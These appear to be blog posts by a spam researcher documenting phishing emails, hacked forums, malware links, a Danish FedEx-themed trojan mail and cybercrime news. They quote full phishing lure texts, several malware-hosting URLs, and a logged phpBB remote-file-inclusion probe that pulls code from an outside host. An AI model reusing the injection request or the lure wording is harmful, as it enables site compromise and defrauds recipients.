Spamhuntress

I received an e-mail that attempted to (in Spanish) getting me to log in somewhere. The link was fake, and pointed somewhere else than it appeared to.

It pointed to an exe file (haven’t tested the exe file) in a folder that turned out to be the docs folder in a phpBB installation. A 2.0.x version. That folder had obviously been compromised, and a lot of scripts had been placed there. The forum appears to have been installed September 2006, but the phpBB files were last modified a year later. Some of the files have dates before that, but probably were uploaded in such a way the original file date was preserved?

I’ve notified the site admin, so let’s see if he responds and tells us what happened. I assume this is a vulnerability that’s been fixed in newer versions of phpBB?

I’ve got an old Invision forum. The latest free version. And yes, I know, it’s a bad idea. But it’s been the only solution for having a decent featured pre-moderated forum for a while, unless you want to pay for the software.

So, it’s gotten hacked a few times. And this last time it was embarassing:

They posted AS ME!

The topic title was “please help”, and the content was one link:

blueice77.com/server.exe

I haven’t checked out the program. I’ll leave that to the security geeks. My forum wasn’t the only one that got hacked like that. They always post as one of the admins, and there’s nothing more than the link in the post.

IP used: 195.22.229.24

It’s an open proxy, so doesn’t help much. And the user agent is the latest English language Firefox version.

The website with the exe file on it appears to have been hacked. The file existed on the server when I tested it, though I don’t know what it contains. Since it’s been hacked, I won’t post the whois here, and I’ll contact the owner.
And on the topic of pre-moderation (I only checked for php software): vBulletin and Invision has pre-moderation. But they’re both commercial software (except for the old version of Invision, that’s got more security holes than a sieve), so not an option for all. Simple Machines and phpBB have promised pre-moderation in the next major version. phpBB has a release candidate with pre-moderation currently available. miniBB has pre-moderation currently, but the new posts will show - you just can’t see the content until approved.

I just got this e-mail, twice to the same address:

Dear Customer,

Our robot has detected an abnormal activity from your IP adress
on sending e-mails. Probably it is connected with the last epidemic
of a worm which does not have official patches at the moment.

We recommend you to install this patch to remove worm files
and stop email sending, otherwise your account will be blocked.

Customer Support Robot

Under the text “this patch”, there’s a link to an IP address with some encrypted looking URL. Different IP addresses for each mail. Both of them already have socket error, so I can’t check out what it contained.

Shaking head… There’s a discussion on “alt.madcrew” about this. Some people who appear to have taken the e-mail at face value. One of them writes:

installed the patch too but now my computer has become very slow and
even when I am not doing anything on my computer my hard drive makes a
lot of noise as if there is a lot of activity, I don’t understand

Someone e-mailed me an example of a hacked site (the hack is currently offline, with the hacked version set up on a hidden page for me to check).

Update: Lots of homepages affected. Check this google search.

It was the homepage of the company that was hacked, with a few links added at the bottom. In addition to those two visible links, there are some hidden links that are identical to the links you’ll find if you follow the .txt links. The links are only visible if you check the source code, so I believe the txt files are meant as includes in the hacked php file.

The first link is: buybeer4me.info/scr/18.txt

It’s got some obfuscated javascript that actually points to the second link:

bestrezult.com/scr/1.txt

The links in that document point to another hacked site:

dinuba.ca.gov/minutes/agendas/.~ss/

When I loaded one of the pages referenced in the spam, I got this. Keep in mind that I had images disabled, so the page might look somewhat …different in reality:

It’s obviously malicious, and I found a post referring to the site it’s loaded from:

mvsps

I went by a website today that had a rather nasty payload. After a search on the site that delivered a search result, the page disappeared and a page from amaena.com loaded instead. I’m always very careful when those appear. I close the windows that pop up (I use Firefox with pop up protection) with Alt-F4. Even so, the Winfixer exe file started downloading and was caught by my anti-virus.

The ad was delivered by ad2profit.com

I’ve never in the past experienced a forced download of Winfixer, so I’m wondering what’s up?

During the night thousands of e-mail addresses connected with people in Denmark have received an e-mail purportedly from fedex.com. It’s written in what appears to me to be perfect Danish, and promises 15 % off if they send in the form attached to the mail. Only the “form” is not a form. It’s an executable with a random numeric name, and containing the virus TR/Spy.Bzub.B.

Some journalists in Denmark originally thought hackers had gotten into fedex and sent out those e-mails. But the e-mails were sent out to random Danish addresses, including inactive ones - both customers and non-customers of Fedex. And I got a sample of the headers, and will paste them in here (the relevant bits). Notice that it doesn’t even come from Denmark:

Received: from 66-195-105-206.static.twtelecom.net [66.195.105.206] by recipientsmailserver2.dk with ESMTP
(SMTPD-8.22) id AA310348; Wed, 18 Apr 2007 22:06:09 +0200
Return-Path:
Received: from 209.205.25.170 (HELO smtp.albert-white.com)
by recipientsmailserver.dk with esmtp (/-26A4FH5 LU6Z)
id 4ESG>0-/FYYK7-OR
for recipient@recipientsmailserver.dk; Wed, 18 Apr 2007 20:06:27 +0600
Message-ID: <01c781f5$0c516520$6c822ecf@gblk>
From: “FedEx”
To:
Subject: Kvittering
Date: Wed, 18 Apr 2007 20:06:27 +0600
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”—-=_NextPart_000_0007_01C781CB.237B5D20″
X-Priority: 3
X-MSMail-Priority: Normal

Notice how it’s got two received lines? The MX record for the e-mail address is for the recipientsmailserver.dk, while there’s another mailserver at the same IP number named recipientsmailserver2.dk (all recipient info munged). So I’m slightly unsure where that mail really came from… The twtelecom address is blocklisted at psbl.surriel.com for another spamrun on April 5

Here’s the text of the e-mail:

Æredede kunde,

Til Deres navn og adresse ankom der en pakke.

De vil få en modtagelseskvittering vedføjet til brevet.

Vær så venlig at åbne brevet og udfylde kvitteringen for at få pakken i den nærmeste FedEx afdeling.

De kan få adressen af den nærmeste FedEx afdeling på side fedex.com

Forbered en forsendelse online ved FedEx og spar på tiden, som De kan bruge til noget andet. De kan få informationer om priser, kan bestille afhentning og emballage, kan overvåge alle Deres forsendelser ved tracking dem derhjemme, osv, på fedex.com.

Registreres De nu, får De 15% rabat på FedEx Express tjenester online for 4 måneder fra registreringsdato.

Deres ærbødige,

Kundeservice

FedEx

Update:

Danish Computerworld has an article today about the speculation that a Baltic group is behind the mail, which they call a phishing mail. According to Peter Kruse at Csis, the virus is designed to spread over instant messengers and web based mail services. It supposedly uses templates (if I translated the Danish word skabeloner right), so I suppose that means it actually sends out messages in people’s names. There was a phishing attempt earlier regarding Tele2, and they feel the method is fairly similar (the use of templates). The command center that the virus phones home to is in Russia, and Danish internet providers have blocked access to it, in order to protect Danish surfers.

Three Russians were sentenced to 8 years of hard time for extortion in connection with denial of service attacks.

Anna from Kaspersky told me in June that there was a Russian law that could be used against cybercrime, but that it hadn’t been used so far. That mirrors what they said in their blog yesterday. This is a very important sentence, even if the sentencing reflected the extortion more than the cybercrime.

Other news reports:

Informationweek, Securityfocus

There’s a new vulnerability in Windows, that Microsoft isn’t going to patch until October 10. In the meantime, Webattacker is pushing out exploits for it.

The vulnerability is for Internet Explorer. If you’re using Firefox, you’re safe from that particular vulnerability.

But how many of us have friends, co-workers and family who insists on using Internet Explorer, because it’s familiar?

ZERT has released a patch for the vulnerability, according to Eweek. It also mentions that Gadi Evron, bothunter extraordinaire, is operations manager for ZERT.

I saw some probing of phpBB in my logs. The probes looked like this:
GET /2006/09/14/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt?

I couldn’t figure it out. Why would they try probing for phpBB where it obviously couldn’t be found? Then it dawned on me - phpBB was in the URL of a post from that day and from 2006/08/07, which was another URL they tried. I since found another outfit probing for the same vulnerability.

Here’s more on that (as it becomes available):

National Vulnerability Database CVE-2006-4780

The code I found in the files they tried to inject - was not innocent. Let’s just put it like that for the time being.

Sunday Times broke a story on stolen identities (credit card details etc) sold on a Russian website.

The website, carder.info, is now offline.

There was an earlier story, and I found a long version of it on an Infosec discussion list.

We’ve had comment spam on here that offered skimmers for sale, and also (if I remember correctly) credit card details.
It’s also interesting to note that only some of the victims of this site knew something was wrong with their computer.